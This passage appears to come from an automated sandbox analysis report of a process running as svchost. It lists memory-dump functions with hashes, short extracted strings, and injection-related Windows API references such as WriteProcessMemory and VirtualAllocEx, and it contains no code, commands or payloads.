Instruction ID: 275c4c3adbbc92a62c5716241dc440fe428df2a0f705e4e0dafd59c72ccf1e5f
Opcode Fuzzy Hash: 2e8f695f58b67c2473a1d9bb9d60d4fc1634bdffe1884ef251f7497c85f1bc64
Instruction Fuzzy Hash: B882A430B0D6594FEB95EE2C98A4AA57BD1EF9A341B1140FAD14DCB2A3DE2CEC458740

Function 00007FFD34691E10 Relevance: 3.0, Strings: 2, Instructions: 521COMMON

Download Yara Rule

Strings

Hww4, xrefs: 00007FFD34696D09
Hww4, xrefs: 00007FFD34696E14

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd34690000_svchost.jbxd

Similarity

API ID:
String ID: Hww4$Hww4
API String ID: 0-3915848289
Opcode ID: b508cc1efe93a894ac3b7d9879adae949c0c915384f404c7a5f491a2ece92b3b
Instruction ID: 598f4e741d6e76718e39993cc2d5cbd98225ca98a2e438f7f539e2c2c7fcf245
Opcode Fuzzy Hash: b508cc1efe93a894ac3b7d9879adae949c0c915384f404c7a5f491a2ece92b3b
Instruction Fuzzy Hash: 66E12231A0DA1A4FEB6C9E28C4A05F973D1EF96314B1401BED18FC75E6DD6CB8469780

Function 00007FFD34670FCC Relevance: 3.0, Strings: 2, Instructions: 505COMMON

Download Yara Rule

Strings

^s4, xrefs: 00007FFD34670ED0
+N_H, xrefs: 00007FFD3467113F

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3466F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3466F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3466f000_svchost.jbxd

Similarity

API ID:
String ID: ^s4$+N_H
API String ID: 0-443380220
Opcode ID: 3b4229b661fff3f4f617fd04413eb0ef88ecda2000f381733a9c4075956802d4
Instruction ID: c336be513641ad636cb684811c9b908963aabc5629938c1bbf7b695b88238bbf
Opcode Fuzzy Hash: 3b4229b661fff3f4f617fd04413eb0ef88ecda2000f381733a9c4075956802d4
Instruction Fuzzy Hash: 5BF1D771B08E594FEB94EE2CC8A56E87BD2FF99344B0440BAD54DD7396DE28EC029740

Function 00007FFD3465D258 Relevance: 3.0, Strings: 2, Instructions: 490COMMON

Download Yara Rule

Strings

d, xrefs: 00007FFD34669969
O_H, xrefs: 00007FFD346699A4

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3465D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3465D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3465d000_svchost.jbxd

Similarity

API ID:
String ID: d$O_H
API String ID: 0-2920189622
Opcode ID: b05fe12033b1fddbd3b1eaa39be6af5fec7df256187b17ee8279be5f6c525034
Instruction ID: e5869f79519d93120a80f97527f5143cd93accee8ea185db95a11bb968b2009e
Opcode Fuzzy Hash: b05fe12033b1fddbd3b1eaa39be6af5fec7df256187b17ee8279be5f6c525034
Instruction Fuzzy Hash: E2F1CD30618B498BE768DF18C4916B6B3E1FF95314F14467EC58EC3696CA39F886CB81

Function 00007FFD346902A5 Relevance: 3.0, Strings: 2, Instructions: 467COMMON

Download Yara Rule

Strings

@'s4, xrefs: 00007FFD346902E6
(cn4, xrefs: 00007FFD34690575

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd34690000_svchost.jbxd

Similarity

API ID:
String ID: (cn4$@'s4
API String ID: 0-1926741586
Opcode ID: f87aabb24ec16b19c33cadec15923e46850704df0d0cf490af2539eaafe3bf6e
Instruction ID: 7ce1f60456df40a367202089d77a1f91e8bc329fc716713cf472e3aad135279c
Opcode Fuzzy Hash: f87aabb24ec16b19c33cadec15923e46850704df0d0cf490af2539eaafe3bf6e
Instruction Fuzzy Hash: A1D1A03170CD194FDB98EB1CD4A4AB577D1FF9A310B0501BAE54EC72A2DE69EC428781

Function 00007FFD34678009 Relevance: 2.9, Strings: 2, Instructions: 405COMMON

Download Yara Rule

Strings

H, xrefs: 00007FFD346783BE
p(r4, xrefs: 00007FFD346783C5

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3466F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3466F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3466f000_svchost.jbxd

Similarity

API ID:
String ID: H$p(r4
API String ID: 0-123009123
Opcode ID: 8d432094a9006343c14ad61b5c027b964e9e7c61d683bcb74377d5679909d997
Instruction ID: 55d42c1df8ef9f635d4c12426fe9f2c98d5018e3e97a0589e9679f3e28573104
Opcode Fuzzy Hash: 8d432094a9006343c14ad61b5c027b964e9e7c61d683bcb74377d5679909d997
Instruction Fuzzy Hash: 25C1C921B09A2B4BEEA5EE2C18F12F527C2EF96355F1491B9D60DD72C2DD1DAC06A340

Function 00007FFD34691DB8 Relevance: 2.9, Strings: 2, Instructions: 369COMMON

Download Yara Rule

Strings

x$x4, xrefs: 00007FFD34691EC6
X%x4, xrefs: 00007FFD34691F99

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd34690000_svchost.jbxd

Similarity

API ID:
String ID: X%x4$x$x4
API String ID: 0-3181750469
Opcode ID: 0bd9ca0973f4887e6b31d3a4e0b2b6a9e19b56696ff677f5c4bb5812de1bf670
Instruction ID: 739567858fae6c997ac4d9888a33f2edf11c447f1d4c3945cbc27d2bdfaf4569
Opcode Fuzzy Hash: 0bd9ca0973f4887e6b31d3a4e0b2b6a9e19b56696ff677f5c4bb5812de1bf670
Instruction Fuzzy Hash: F5C18030A18A5E8FEF94DF58C4A5AED77E1FF69304F144169D409D7296CE78E882CB80

Function 00007FFD346780B5 Relevance: 2.8, Strings: 2, Instructions: 337COMMON

Download Yara Rule

Strings

H, xrefs: 00007FFD346783BE
p(r4, xrefs: 00007FFD346783C5

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3466F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3466F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3466f000_svchost.jbxd

Similarity

API ID:
String ID: H$p(r4
API String ID: 0-123009123
Opcode ID: 2f9b56ac1d473c6d90543d42ec9b14b4682e3a30bc33d314052186dcace5a2e2
Instruction ID: ef55f8774ffc79ae1e4699d8e5676c67973b5db21663fc688a360bf77ef5367e
Opcode Fuzzy Hash: 2f9b56ac1d473c6d90543d42ec9b14b4682e3a30bc33d314052186dcace5a2e2
Instruction Fuzzy Hash: 06A16720B089664BEEA5EE2C08F52F527C29FA7345F54A0B9D64DD72D2DD1DAC06A340

Function 00007FFD3467E867 Relevance: 2.8, Strings: 2, Instructions: 289COMMON

Download Yara Rule

Strings

(cn4, xrefs: 00007FFD3467EB36
@'s4, xrefs: 00007FFD3467EC3D

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3467B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3467B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3467b000_svchost.jbxd

Similarity

API ID:
String ID: (cn4$@'s4
API String ID: 0-1926741586
Opcode ID: 3413ec89d8ffbddf069403b169e1d094fd7c7836d4339c5016442e54456d4358
Instruction ID: 5f417173b3cbe910d56b123cf285a62b77ebcd5986af39bac2bb91bbff9ad1aa
Opcode Fuzzy Hash: 3413ec89d8ffbddf069403b169e1d094fd7c7836d4339c5016442e54456d4358
Instruction Fuzzy Hash: 53A10671A4D7D64FE7639B7488A42E57FE1AF53220B0940FFC589CA193E91C6C4AC711

Function 00007FFD34676E3E Relevance: 2.7, Strings: 2, Instructions: 192COMMON

Download Yara Rule

Strings

XNu4, xrefs: 00007FFD34676EEE
XNu4, xrefs: 00007FFD34676F9E

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3466F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3466F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3466f000_svchost.jbxd

Similarity

API ID:
String ID: XNu4$XNu4
API String ID: 0-19917421
Opcode ID: e1f272d9b2a1133b7d289b98eadabb6a80f393e7fb0bbc6a3291b7439c4331fc
Instruction ID: 89b0e536057e7aa405cd725478f31ea93223edd5f544a546b85ce3ba86a36527
Opcode Fuzzy Hash: e1f272d9b2a1133b7d289b98eadabb6a80f393e7fb0bbc6a3291b7439c4331fc
Instruction Fuzzy Hash: 4551D37171CA484FDB98EF28C4A4AA577E1FF99310B1441BED44EC77A2DE28EC418741

Function 00007FFD34692B10 Relevance: 2.7, Strings: 2, Instructions: 181COMMON

Download Yara Rule

Strings

Hww4, xrefs: 00007FFD34692F9B
Hww4, xrefs: 00007FFD34693048

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd34690000_svchost.jbxd

Similarity

API ID:
String ID: Hww4$Hww4
API String ID: 0-3915848289
Opcode ID: 570738fcd64408f61d4379c4ddc6965045dcb5fd5968e6c40397df13a7448fb9
Instruction ID: 762156803f9fcd3a95933f593f462914d9147325e27fb94b56167b1c32512367
Opcode Fuzzy Hash: 570738fcd64408f61d4379c4ddc6965045dcb5fd5968e6c40397df13a7448fb9
Instruction Fuzzy Hash: F351E631B09A5D5FEB98EE7884B52F9B7D1EF9A305B0401BED44ED72D2CE6DA8018740

Function 00007FFD34692F5D Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

Hww4, xrefs: 00007FFD34692F9B
Hww4, xrefs: 00007FFD34693048

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd34690000_svchost.jbxd

Similarity

API ID:
String ID: Hww4$Hww4
API String ID: 0-3915848289
Opcode ID: 37437ea65b68217fbab8965499aee3dd4c32baf48ef510eb7031100ee6856fa8
Instruction ID: c9f731bd56d29b93d9c062ee80fe06b2f2bd31689468b9b8e4981dd4936cb3a1
Opcode Fuzzy Hash: 37437ea65b68217fbab8965499aee3dd4c32baf48ef510eb7031100ee6856fa8
Instruction Fuzzy Hash: 9551E531B19A194FEB98EF6888B52F877D1FF9A305F0401BED50ED7292CE6DA8418750

Function 00007FFD34668B65 Relevance: 2.7, Strings: 2, Instructions: 156COMMON

Download Yara Rule

Strings

p(r4, xrefs: 00007FFD34668C65
psn4, xrefs: 00007FFD34668B6A

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3465D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3465D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3465d000_svchost.jbxd

Similarity

API ID:
String ID: p(r4$psn4
API String ID: 0-187066348
Opcode ID: 969d1b488c6c14df73a3629581b8f78ce0644f864ae646e704808cd422fae650
Instruction ID: 84aa630353346b6029afc49884590c429db10427e3b59859fb37a34eba1460e3
Opcode Fuzzy Hash: 969d1b488c6c14df73a3629581b8f78ce0644f864ae646e704808cd422fae650
Instruction Fuzzy Hash: 5D41D5B070DA198FDB98EF28D4A46B973D1FF96361B1411BDD54EC7292CE2CE8428741

Function 00007FFD3467ED41 Relevance: 2.6, Strings: 2, Instructions: 150COMMON

Download Yara Rule

Strings

7M_L, xrefs: 00007FFD3467EDEF
@'s4, xrefs: 00007FFD3467EDCF

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3467B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3467B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3467b000_svchost.jbxd

Similarity

API ID:
String ID: 7M_L$@'s4
API String ID: 0-70738652
Opcode ID: 5b2b2836619923f58bec7f67d904b1bb5a9d4e68e7dede0247d525391cf9bb62
Instruction ID: 3475d86aa87a2729d6ffa6aa22ae0a73e3f4714029ad98571572de62af049651
Opcode Fuzzy Hash: 5b2b2836619923f58bec7f67d904b1bb5a9d4e68e7dede0247d525391cf9bb62
Instruction Fuzzy Hash: 6E413A31B0CB650BE768DB29C8A55B97BD1EF96310B04C5BBD44DC7296DE2CAC468380

Function 00007FFD3468DFF8 Relevance: 2.6, Strings: 2, Instructions: 143COMMON

Download Yara Rule

Strings

@'s4, xrefs: 00007FFD3468E01B
@'s4, xrefs: 00007FFD3468E06C

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3468B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3468B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3468b000_svchost.jbxd

Similarity

API ID:
String ID: @'s4$@'s4
API String ID: 0-1051897079
Opcode ID: 3cf3c9f0cf089e5bc932afe204e0a8044f723c6be7f616dd5c2156b236eeb19d
Instruction ID: 8733a80c568b1e8edbf89e0a52cb5f8032f4d0d61260bda822e0aa9084b3507f
Opcode Fuzzy Hash: 3cf3c9f0cf089e5bc932afe204e0a8044f723c6be7f616dd5c2156b236eeb19d
Instruction Fuzzy Hash: 2441D331709E194FEBD8EE1CD4A5BB5B3D1FB9A310B1405BAD14DC3692CA29FC428781

Function 00007FFD34672F2D Relevance: 2.6, Strings: 2, Instructions: 141COMMON

Download Yara Rule

Strings

`%s4, xrefs: 00007FFD34672FC7
`%s4, xrefs: 00007FFD34673005

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3466F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3466F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3466f000_svchost.jbxd

Similarity

API ID:
String ID: `%s4$`%s4
API String ID: 0-1573933689
Opcode ID: e8507a7ec2a4f8fd950f9db9cef886994729da0ca28ebe03cb518b16dd555d58
Instruction ID: 9dd14ae3ea7a77199372babe9612ae69f405f2e103cfecff767855ac47669030
Opcode Fuzzy Hash: e8507a7ec2a4f8fd950f9db9cef886994729da0ca28ebe03cb518b16dd555d58
Instruction Fuzzy Hash: 0C311821B0DA5A0FE795EE5C58E46B43BD1DF9A361B0441BBD54DC7293DD1CEC828350

Function 00007FFD3468245D Relevance: 2.6, Strings: 2, Instructions: 123COMMON

Download Yara Rule

Strings

XNu4, xrefs: 00007FFD346824A2
XNu4, xrefs: 00007FFD34682502

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD34682000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34682000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd34682000_svchost.jbxd

Similarity

API ID:
String ID: XNu4$XNu4
API String ID: 0-19917421
Opcode ID: 00fbc851a793fd6eca79b46040d60a2d8847f0d43a0347777698e3c63fc715c2
Instruction ID: 4033a39672f7e6db038925b36828e52f28f0391d4bed5297ef23415934989732
Opcode Fuzzy Hash: 00fbc851a793fd6eca79b46040d60a2d8847f0d43a0347777698e3c63fc715c2
Instruction Fuzzy Hash: 2B31C46270CA8D4FDB98EF2CD4A06F537D1EB5A31471002BBD04FC7286DD28A8468780

Function 00007FFD346694F5 Relevance: 2.6, Strings: 2, Instructions: 122COMMON

Download Yara Rule

Strings

`ks4, xrefs: 00007FFD34669599
`ks4, xrefs: 00007FFD346695AF

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3465D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3465D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3465d000_svchost.jbxd

Similarity

API ID:
String ID: `ks4$`ks4
API String ID: 0-465773164
Opcode ID: ca996f574c8aaa082d9b86a87da405d53224877fedb5073bc65f0e5cb4f9019d
Instruction ID: c56351a6103ac94975250b980d79930fd2a914438627061237066ddd2919e9d0
Opcode Fuzzy Hash: ca996f574c8aaa082d9b86a87da405d53224877fedb5073bc65f0e5cb4f9019d
Instruction Fuzzy Hash: BF31C421709A195FDB94DE2884E06A1B7D2FF99324B1442BAD94DC7247DA2CEC86CBC0

Function 00007FFD3467ED99 Relevance: 2.6, Strings: 2, Instructions: 112COMMON

Download Yara Rule

Strings

7M_L, xrefs: 00007FFD3467EDEF
@'s4, xrefs: 00007FFD3467EDCF

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3467B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3467B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3467b000_svchost.jbxd

Similarity

API ID:
String ID: 7M_L$@'s4
API String ID: 0-70738652
Opcode ID: 2eec1d4c0040aa9e358b68915f978e12a37a9741edd84fd537145dc13a0fbe46
Instruction ID: d3a595e7016a9790ef903718c5eb1b17ea36a58866da77b806755369b65876bc
Opcode Fuzzy Hash: 2eec1d4c0040aa9e358b68915f978e12a37a9741edd84fd537145dc13a0fbe46
Instruction Fuzzy Hash: 61312B31B0CF560FE768DA18C8955B97BE1FF95310B14867FE44DC3292DE28E8468380

Function 00007FFD3467BF55 Relevance: 1.8, Strings: 1, Instructions: 505COMMON

Download Yara Rule

Strings

X"r4, xrefs: 00007FFD3467C35F

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3467B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3467B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3467b000_svchost.jbxd

Similarity

API ID:
String ID: X"r4
API String ID: 0-680101150
Opcode ID: af7d260523be53a862e895d40cbe0a89eb9cfe712917d4001bdc9a8328663dbf
Instruction ID: 6b19ab88b49209478eb41dbc5e6de3fd4cdc7a1487e9062912157cc429905f49
Opcode Fuzzy Hash: af7d260523be53a862e895d40cbe0a89eb9cfe712917d4001bdc9a8328663dbf
Instruction Fuzzy Hash: 5FF19531B0895A8FDB95DE18D8E0AB577D2EF9A314B1481B9C14DCB686CE2DFC82D740

Function 00007FFD3466FC7E Relevance: 1.7, Strings: 1, Instructions: 468COMMON

Download Yara Rule

Strings

>N_H, xrefs: 00007FFD3466FDC3

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3466F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3466F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3466f000_svchost.jbxd

Similarity

API ID:
String ID: >N_H
API String ID: 0-244349053
Opcode ID: 2bb819165f5dcba5a95bb124f2e7a2cac4f7bd879148dcc29622f5ecdfad352a
Instruction ID: 0b5244663b1d81c8b09676a9eaf2a1518ebcbaf25337631220c24f1e790c5ebd
Opcode Fuzzy Hash: 2bb819165f5dcba5a95bb124f2e7a2cac4f7bd879148dcc29622f5ecdfad352a
Instruction Fuzzy Hash: 4FD10431B0CA1A4FE79CAA2CA4A16F577D1EF86324F1442BED50DC7286DD2DEC429381

Function 00007FFD3479140B Relevance: 1.7, Strings: 1, Instructions: 461COMMON

Download Yara Rule

Strings

A, xrefs: 00007FFD3479149D

Memory Dump Source

Source File: 00000018.00000002.2487170687.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd34790000_svchost.jbxd

Similarity

API ID:
String ID: A
API String ID: 0-3554254475
Opcode ID: 4289c34035d90ffa41b315828fcba110e66e191119e98f9f2493c33ca8a5e673
Instruction ID: f4e912977e506f8c71c211bc18be71bdd6b90a7af313157855bcea4be778dbce
Opcode Fuzzy Hash: 4289c34035d90ffa41b315828fcba110e66e191119e98f9f2493c33ca8a5e673
Instruction Fuzzy Hash: 75D118A2E0D7C68FF7568A2848A65A47FE0EF57300B0901FBD189C71E3D91DB856D392

Function 00007FFD346909F5 Relevance: 1.7, Strings: 1, Instructions: 448COMMON

Download Yara Rule

Strings

(cn4, xrefs: 00007FFD34690EFB

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd34690000_svchost.jbxd

Similarity

API ID:
String ID: (cn4
API String ID: 0-3566837544
Opcode ID: 94cb8be468e23289593681496ecab3d248f5d0882a14df7826029089a00a9f38
Instruction ID: b71329918ef579274f55a249d7d1980b981d4ec9e63f948df8eb1dcf652155d4
Opcode Fuzzy Hash: 94cb8be468e23289593681496ecab3d248f5d0882a14df7826029089a00a9f38
Instruction Fuzzy Hash: 1FD1D322B0EEAA4FE7969B2884B05F57BE1EF4721070801FAC549CB1E3DE1DAC46D341

Function 00007FFD346AD405 Relevance: 1.7, APIs: 1, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD346A6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd346a6000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dccf2fd04c9fddef0b32ce956a3f1b212002f2eabda91c46decb6b7cef68dd9
Instruction ID: 5eeca6d4c335915c75ec6fa5a5caa4e38f214bee9c443010dfbbbe8e9cc68cdf
Opcode Fuzzy Hash: 5dccf2fd04c9fddef0b32ce956a3f1b212002f2eabda91c46decb6b7cef68dd9
Instruction Fuzzy Hash: 5351013190DB9C8FDB99DF6C84542E9BBE1FB99311F04426FE489D3292CB38A845C781

Function 00007FFD346AD449 Relevance: 1.7, APIs: 1, Instructions: 171processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE ref: 00007FFD346AD571

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD346A6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd346a6000_svchost.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: ad8d2d6a1951e3692f532bd60e883e09573a14a9aa7b9000c8a2c8ba3e7c767d
Instruction ID: 962784e18040d3104fa15d19adb26732698922fc704a54af79ecfe97e9faf8d1
Opcode Fuzzy Hash: ad8d2d6a1951e3692f532bd60e883e09573a14a9aa7b9000c8a2c8ba3e7c767d
Instruction Fuzzy Hash: 7051FF3190CB5C8FDB59DF5C88546E9BBE1FBA9321F05426FE489D3292CB34A8458B81

Function 00007FFD34654E49 Relevance: 1.6, APIs: 1, Instructions: 140memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00007FFD34654F0D

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd34650000_svchost.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 755f7bf584868710785d369057dbe6cf79507015f40bc8ed634bc57e2425b900
Instruction ID: 995206215493c27d545c68c463cce8c168393134fc464af32a213761a78ed00c
Opcode Fuzzy Hash: 755f7bf584868710785d369057dbe6cf79507015f40bc8ed634bc57e2425b900
Instruction Fuzzy Hash: 57311A7190CB5C4FD7189FAD98566FE7BE0EF96321F00426FE089D3242DB7468068781

Function 00007FFD34660F70 Relevance: 1.6, Strings: 1, Instructions: 390COMMON

Download Yara Rule

Strings

d, xrefs: 00007FFD34666ADE

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3465D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3465D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3465d000_svchost.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 7237534e5200dde710a257dbe13b8c0a5a116c88a42437d3bf70d39a9071281d
Instruction ID: 353b1611db256e90019fd9d069efc31653c36a8beebaa65a0892777190124c10
Opcode Fuzzy Hash: 7237534e5200dde710a257dbe13b8c0a5a116c88a42437d3bf70d39a9071281d
Instruction Fuzzy Hash: 1BC10F3061CB558FE728DF18E4A15B5B3E1FF9A320B10457DD18AC32A6CA39F8438B81

Function 00007FFD346AE216 Relevance: 1.6, APIs: 1, Instructions: 132injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE ref: 00007FFD346AE2EA

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD346A6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd346a6000_svchost.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 22395c09b716bcf3a3543fcd9794ea7c3079e4b28848674ca38ecaec1cc40d18
Instruction ID: 318b7bf246cbb1b2721fd4f95e964a297e8530e00c8c170e07a19702dcc104b2
Opcode Fuzzy Hash: 22395c09b716bcf3a3543fcd9794ea7c3079e4b28848674ca38ecaec1cc40d18
Instruction Fuzzy Hash: CF41D37191CB588FDB58DF98D8496F9BBF4EB99311F00426FE089D3252CA74A805CB92

Function 00007FFD346ADBBD Relevance: 1.6, APIs: 1, Instructions: 131injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE ref: 00007FFD346ADC80

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD346A6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd346a6000_svchost.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: d2ba78287ae80c9a0cfa5eaab54b0ed7c4c1b18927958600130d35ccfb513b73
Instruction ID: c7cf598e30225ad4cf37d0f1abe1de1b7fb0397cc2a4cd9569570ad0461dc207
Opcode Fuzzy Hash: d2ba78287ae80c9a0cfa5eaab54b0ed7c4c1b18927958600130d35ccfb513b73
Instruction Fuzzy Hash: F231377190CB888FDB19DF5CD8466F97BE1EB9A321F04426FE089D3192CA746806C792

Function 00007FFD3467D404 Relevance: 1.6, Strings: 1, Instructions: 381COMMON

Download Yara Rule

Strings

p(r4, xrefs: 00007FFD3467D55F

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3467B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3467B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3467b000_svchost.jbxd

Similarity

API ID:
String ID: p(r4
API String ID: 0-1083737881
Opcode ID: dc4afa2e2301eddab7373cec1bc0ab062c355ff78a5cf5380987bba2fb79c49f
Instruction ID: f0396290585080c9767c6b9e9149de4685e162aac14f9712c57644f88be4b73a
Opcode Fuzzy Hash: dc4afa2e2301eddab7373cec1bc0ab062c355ff78a5cf5380987bba2fb79c49f
Instruction Fuzzy Hash: 55C1D430B1CB5A4FE764EF1884A16B577E1EF95304F14867AD54EC3297DE28F8428781

Function 00007FFD346A7D29 Relevance: 1.6, APIs: 1, Instructions: 118memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00007FFD346A7DD1

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD346A6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd346a6000_svchost.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1f7a28ef647cd4b7eafa7d0d1603a3fbce4dccd34fc7368fd4fd3cfe3831c6eb
Instruction ID: ce9a654d9c2d79d86a55bd9730c8cce8dd6d05de6e872f74da5ac754d2f77649
Opcode Fuzzy Hash: 1f7a28ef647cd4b7eafa7d0d1603a3fbce4dccd34fc7368fd4fd3cfe3831c6eb
Instruction Fuzzy Hash: EE31E631A0CB5C4FDB19DF9998466F9BBF1FB56321F04426FD049D3192CB64A846CB81

Function 00007FFD346AD9C8 Relevance: 1.6, APIs: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE ref: 00007FFD346ADA66

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD346A6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd346a6000_svchost.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 26a76990f9eb551a657e7ef06bde38b239b6762f92728ddc3a8cc2c9395c26ec
Instruction ID: e93f7f98f7068d17269608db96846c28f28075bb0fa8d81773e18a417e8dfe7d
Opcode Fuzzy Hash: 26a76990f9eb551a657e7ef06bde38b239b6762f92728ddc3a8cc2c9395c26ec
Instruction Fuzzy Hash: B331C671A0CA4C8FDB5CEF5CD846AF977E1FBA9321F10422ED049D3552CB74A8528B85

Function 00007FFD3468CF0C Relevance: 1.6, Strings: 1, Instructions: 363COMMON

